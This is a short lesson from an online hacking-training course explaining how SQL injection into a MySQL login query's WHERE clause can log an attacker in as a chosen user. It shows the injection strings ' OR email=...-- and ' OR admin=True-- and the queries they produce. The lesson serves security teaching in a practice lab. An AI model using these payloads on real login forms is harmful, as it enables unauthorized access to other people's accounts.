(MySQL) Changing WHERE clauses to bypass authentication (specific user)

Easy10MIN

In the last module, we learned how a programming error can lead to an attacker being able to modify the structure of the SQL queries made by the application.

We did an exercise where we bypassed the login by forcing the database to return all user rows regardless of the password, allowing the application to log us in as the first user, who happened to be the system administrator.

But what if we want to log in as a different user? In this case, we need to add conditions to the WHERE clause of the query, which instruct the database to return only the desired user instead of every user.

If we knew the administrator's email address, we could approach the problem, for example, by injecting ' OR email='[email protected]'-- resulting in SQL:

SQL

1SELECT * FROM user WHERE email='[email protected]' AND password='foo' OR email='[email protected]'-- '

However, we do not know the administrator's email address. Instead, we know that there is a column named admin in the database that is in boolean format, meaning its value is True or False.

We should be able to log in as an administrator as long as we ensure that the query only returns rows where the value of the admin column is True. Try the practice below and try to get the application to execute a query like this.

SQL

1SELECT * FROM user WHERE email='[email protected]' AND password='foo' OR admin=True-- '

1 / 2

Previous: What are SQL Injections?Previous Next: (MySQL) Modifying WHERE clauses to bypass authorizationNext

Hakatemia Pro

Learn to hack — start here

Hundreds of interactive courses, virtual labs and CTF challenges in your browser. Start a free trial — no card required.